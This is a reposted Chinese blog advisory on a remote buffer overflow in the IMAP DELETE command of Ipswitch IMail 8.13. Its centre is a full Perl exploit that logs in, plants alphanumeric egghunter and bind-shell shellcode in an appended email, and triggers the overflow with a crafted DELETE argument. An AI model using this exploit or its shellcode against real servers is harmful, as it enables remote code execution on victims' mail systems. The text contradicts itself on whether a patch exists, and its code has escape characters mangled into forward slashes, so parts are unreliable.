IMail 8.13远程DELETE命令缓冲区溢出漏洞

最新推荐文章于 2022-02-23 14:19:48 发布
最新推荐文章于 2022-02-23 14:19:48 发布
阅读量1.4k 收藏
点赞数
分类专栏: 邮件服务器 文章标签: delete credentials server authentication generator buffer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cndgm/article/details/218130
版权
 

一。邮件技术资讯网备注:这个漏洞Imail Server 8.13中发现。据消息在IMail Server 8.14及更高版本已修补,请各位及时下载最新版的补丁,本站在早前已提供下载,地址如下:

A)Imail 8.14下载地址:
http://www.5dmail.net/down/list.asp?id=901


B)Imail 8.14补丁

http://www.5dmail.net/down/list.asp?id=902

 

二。以下为转载原文:

 

涉及Ipswitch IMail程序 描述

IPSwitch IMail 8.13远程DELETE命令缓冲区溢出漏洞 

Ipswitch IMail Server是一款强大的邮件解决方案。
Ipswitch IMail Server在处理DELETE命令时处理不正确,远程攻击者可以利用这个漏洞对系统进行缓冲区溢出攻击。
Ipswitch IMail在处理DELETE命令时缺少正确的边界缓冲区检查,验证用户提交超长参数的DELETE命令可以进程权限在系统上执行任意指令。

<*来源:Jerome jerome@athias.fr

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110037283803560&w=2
*>

受影响系统:
Ipswitch IMail 8.13 

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jerome jerome@athias.fr)提供了如下测试方法:

#!/usr/bin/perl -w
###################################
#
# IPSwitch-IMail-8.13-DELETE
#
# Discovered by : Muts
# Coded by : Zatlander
# WWW.WHITEHAT.CO.IL
#
##################################
#
# Plain vanilla stack overflow in the DELETE command
# Restrictions:
#  - Need valid authentication credentials
#  - Input buffer only allows characters between x20 -> x7e
#
# Credits:
#  - http://www.metasploit.org - HD Moore for the metasploit shellcode
#  - http://www.edup.tudelft.nl/~bjwever/menu.html - skylined for the ALPHA ascii /
shellcode generator #  - http://www.hick.org - for the syscall egghunt code in the /
paper "Understanding Windows Shellcode" #
##################################

use IO::Socket;
use Getopt::Std;
use Mail::IMAPClient;

print "Exploit for the IPSwitch IMail DELETE buffer overflow/n";
print "C0d3d by Zatlander/n";
print "Discovered by Muts/n";
print "WWW.WHITEHAT.CO.IL/n";
print "For hacking purposes only!!!/n/n";

# Find shellcode with signature "w00tw00t"; start from esp
# from 0 -> $egghunter = /
"TYIIIIIIIIIIIIIIII7QZjAXP 0A 0AkAAQ2AB2BB0BBABXP8ABuJIVSyBUco0OKbWdp00ptH0uXqRnkHH 2a 3PL /
Mvtvqzm6NulfePabTiaxbycrb09Gjt5xkTySjeTsEzFmSo2eXyoKRA"; $egghunter = /
"TYIIIIIIIIIIIIIIII7QZjAXP 0A 0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PL /
MtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA";

# Real shellcode: bind shell on port 4444 ( ./alpha edx < shellcode.bin )
$shellcode = "JJJJJJJJJJJJJJJJJ7RYjAXP 0A 0AkAAQ2AB2BB0BBABXP8ABuJIKLjH2vUP7puPQCQEV6aGn /
kbLWT28NkpEWLlKpT35QhgqKZlKPJvxLKQJWPuQXkKSdrSyLKgDLKuQJNVQ9okLP1KpLlP8kPBT7wyQXOVmvah /
GZKl25kSLwTGdqeKQlK2zUts1jKSVnktL0KNkaJWlUQxkLK7tnkUQM8zKgrVQYP1OqNQMQKkreXWpSnSZp03i1 /
tlKGilKSkvlLKQK5Lnk7kLKckTH0SSXLNpN6nJLKOJvK9IWK1ZLuPfawps0Rwv63cMYiuJHDguPuPS0Np7qWp7 /
pnV6ywhYwMttYt0Yym5QYK62inDvzd0Kwy4nMDniyXYUYkENMHKxmylgKpWPSVRSovS4ruPckLMpKupRqKOYGK /
9YOoyKsLMBUTTRJs7Ryv1RsYoTtNokOv534pYk9dDNnyrxrtkgWPTKOtwIoRutpfQkp2ppPrpF0spPPaPv09oR /
uFLniYWuaYKScpSe86bC 07a 3lmYIpSZVpRpQGyoruQ4QCF7kOv5thBsSdSgIoRuUpNiYWPhpCRmStwpoyXcLGy /
jDqIPnmQlQ4NLaz7e69zSlkNgJZosXlPTkvQT7TTP1TQvYWpDWTul5QUQLIcLTdRhK9SLQ4RlmY1letPPLMSt5 /
tFpqDrppQRqCaSqSa2iBqRqRspQKO45uPbH0rKNNS4VKOpU5TyoXPLIyvKO45S0QxnMN9fexNYov5S4oyHCbJK /
OKOTvkOzsyorU30BHl0MZfdaOkORu7tFQyKPSIo8PA";

getopts("h:u:p:", /%args);

if ((!defined $args{h}) || (!defined $args{u}) || (!defined $args{p})) {
  print "Usage: $0 -h [host] -u [username] -p [password]/n";
  exit;}

$usr = $args{u};
$pwd = $args{p};
$host = $args{h};

# jb +20; jnb +20 -> jump over return address (0x21 is first ascii safe offset)
$jmp21 = "r!s!";

# 0x 6921526A -> pointer to "CALL [EDX+8]" ends up in return address
##########################################################################
# This should hopefully be the only version dependent variable here.
# Find an ASCII safe address pointing to a CALL [EDX+8] for your OS
##########################################################################
$calledx8 = "jR!i";

# aAA aligns ESP with the egghunter shellcode (popad, pop, pop)
$asciieh = "aAA" . $egghunter;
$asciisc = "w00tw00t" . $shellcode;
$email =
  "From: /"The guy hacking you/" <a/@b.com>/r/n" .
  "To: /"Poor You/" <b/@c.com>/r/n" .
  "Subject: $asciisc/r/n" .
  "Date: Wed, 3 Nov 2004 14:45:11 +0100/r/n" .
  "Message-ID: < 000101c 4c 1acdcndj6d69b90$5e 01a 8c 0/@snorlax>/r/n" .
  "Content-Type: text/plain;/r/n/tcharset=/"us-ascii/"/r/n" .
  "Content-Transfer-Encoding: 7bit/r/n" .
  "/r/n" .
  $asciisc;

$payload = "A" x 236 . $jmp21 x 3 . $calledx8 . "S" x 29 . $asciieh . "/r/n";

print "Login in to $host as $usr/$pwd/n";
my $imap = Mail::IMAPClient->new( Server => $host, User => $usr, Password=> $pwd) or /
die "Cannot connect: $@"; print "count: " . $imap->message_count("Inbox") . "/n";
print "Sending EGG/n";
$imap->select("Inbox") or die "Could not select: $@/n";
my $uid = $imap->append( "Inbox", $email ) or die "Cannot append: $@";
$msg = $imap->message_string($uid) or die "Cannot get message: $@";
#$msg = $imap->body_string($uid) or die "Cannot get message: $@";
#print "retrieving $uid back: $msg/n";

print "Overflowing DELETE/n";
$imap->delete($payload) or die "Cannot delete: $@n";

print("Finished.../n");

厂商补丁:Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ipswitch.com/

MDaemon Server 8.0 正式版发布
想邮就邮
04-13 3454
来源:本站原创转载请注明来自(邮件技术资讯网(http://www.5dmail.net) 作者:钉子 票数:0等级:点击:4 一。美国时间2004年4月12日,Alt-N发布MDaemon Server 8.0 正式版,以下为官方发布说明:-----------------------------MDaemon 8.00 - April 12, 2005-----------------
IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) (转)
csd3176的博客
12-07 677
IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) (转)[@more@]IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) 涉及程序: SMTP daemon 描述: IMail SMTP 服务器缓冲区溢出导致...
MailEnable的IMAP服务UNSUBSCRIBE命令超长参数溢出
03-18 1144
看了下MailEnable的IMAP服务UNSUBSCRIBE命令超长参数溢出问题。有点麻烦,看了快两天才弄清楚,希望没看错。主要是用IDA反汇编,然后结合OD一起看的。先用perl写了个脚本测试,代码很简单: 代码:
imail 删除历史邮件命令
diedangxiang4092的博客
02-10 130
删除旧的邮件(immsgexp.exe)Immsgexp.exe可以让管理员删除指定天数的旧的邮件.基本语法 immsgexp-tstartdirectory-d#of_days_to_save 所有在目录startdirectory之下的邮箱都会被检查,并且邮件的日期长于指定的天数#of_days_to_save都会被删除.日志文件exYYMMDD.log(或...
imail邮件服务器的安装,IMail 的安装和设置 图文教程
weixin_35896668的博客
07-30 3733
IMail的安装和设置1、安装。①双击安装文件imtm_x86.exe,即可进行安装。除了在选择所安装的IMail服务中加选IMail Password和IMail Web Server外,其他均使用默认选项。②安装完成,重新启动后,就可在“开始→程序→IMail”中找到相关文件。2、增加邮件服务器(POP3)和邮件用户。①运行IMail管理器。选“开始→程序→IMailIMail Admini...
渗透之——Metasploit命令及模块
热门推荐
冰河的专栏
01-26 3万+
show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出制定渗透攻击或模块的相关信息。 use name 装载一个渗透攻...
imail - 邮件系统
midoks
02-23 853
项目愿景 imail项目旨在打造一个以最简便的方式搭建简单、稳定的邮件服务。使用 Go 语言开发使得 imail 能够通过独立的二进制分发,并且支持 Go 语言支持的 所有平台,包括 Linux、macOS、Windows 以及 ARM 平台。。 地址 https://github.com/midoks/imail 截图 ...
imail PHP,NT下基于邮件服务软件(IMAIL)的邮件发送程序–(本地版)-PHP教程,邮件处理...
weixin_35710158的博客
03-18 284
有很多朋友为了php的mail函数而苦恼,其实关键就是它的smtp服务的问题。现在常用的163、sina等大都不支持匿名发送邮件,就是说即使你把php.ini中的smtp设为smtp.163.net/smtp.sina.com.cn也会提示错误。怎么办呢?今日搞到了一个叫imail的邮件服务软件,试了一试,居然成功了。现将方法说明如下:1、安装imail。按照默认的安装,一般如果你的机器的名称是s...
防止溢出类攻击
软件哲学
03-09 1321
CNET中国·PChome.net   类型:转载   作者:   来源 : 赛迪网技术社区  防止溢出类攻击在频频恶意攻击用户、系统漏洞层出不穷的今天,作为网络管理员、系统管理员虽然在服务器的安全上都下了不少功夫,诸如及时打上系统安全补丁、进行一些常规的安全配置,但有时仍不安全。因此必须恶意用户入侵之前,通过一些系列安全设置,来将入侵者们挡在"安全门"之外,下面就将最简单、最有效的防
IMail server.zip
07-11
这是一个高性能的,基于标准的SMTP/POP3/IMAP4/LDAP邮件服务器。通过一个简单直观的图形用户界面,非常易于...主要特色包括:多域名支持,远程管理,Web邮件,可创建邮递清单(mailing lists),反垃圾邮件支持,等等。
imail8.22安装激活实例[图文]
09-30
今天制作此实例的目的是因为前几天我提供了IMAIL8.22中文模板和算号器,这几天问我怎么注册的人还挺多,一句话又讲不清,不讲吧,又觉得对不起朋友们,所以花了点时间,做了此实例,方便朋友们使用,高手就不用看了
Imail邮件服务器的安装与配置.docx
10-25
Imail邮件服务器的安装与配置】 Imail邮件服务器是一款适用于Windows NT/2000/XP等操作系统的互联网邮件传递服务器,它以其易用性、安全性以及强大的反垃圾邮件功能而受到青睐,尤其适合于局域网内的电子邮件通信...
vbs imail 密码解密
09-05
2. **注册表路径**:脚本定义了几个关键的注册表路径,如`SOFTWARE\Ipswitch\IMail\Domains`,这些路径包含了IMail的配置信息。 3. **枚举子键**:使用`EnumKey`方法遍历指定键下的所有子键。 4. **获取字符串值**:...
邮件服务器论坛精华帖(2)
想邮就邮
12-11 9596
ID 主题作者人气  最后更新  | 回复人 如何设置附件大小限制?itisring4/196 2004-05-26 22:57 | huagai 求教各位该如何设置自动回复mail.jia7/240 2004-07-10 03:59 | samfan Mdaemon无法启动 [2]chat_lei10
邮件服务器论坛精华帖(1)
想邮就邮
12-11 3768
ID 主题作者人气  最后更新  | 回复人 Exchange2000 OWA非标准端口修改密码问题的后继wyl_xp1/17 2004-12-09 23:43 | yinjie [原创]简析修改Exchange Server各协议版本信息(Banner)钉子1/80 2004-12-04 23:42 | yinjie
邮件服务器论坛精华帖(3)
想邮就邮
12-11 3398
对“终于解决OWA不能打开密码修改窗口的问题了”一文...神经网络3/224 2004-04-18 12:29 | visitor @163.com电子邮箱增加HELO检查chyangwa0/312 2004-04-08 11:48 | -------- EXCHANGE系统的默认队列说明andybad3/617 200
邮件服务器论坛精华帖(4)
想邮就邮
12-11 2543
ID 主题作者人气  最后更新  | 回复人 rfc 2554 SMTP服务认证扩展钉子0/419 2003-06-23 16:57 | -------- 邮件传输原理及相关入门知识概述钉子0/681 2003-06-23 16:57 | -------- POP3协议命令原始码及工作原理钉子0/452
IMail安装与设置完全指南
"本资源提供了一份详尽的IMail安装和设置的图文教程,适合正在使用或准备使用IMail邮件服务器的用户参考。教程涵盖了从安装到配置邮件服务器和添加用户的步骤,还特别介绍了如何设置Web登录方式,方便用户通过Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值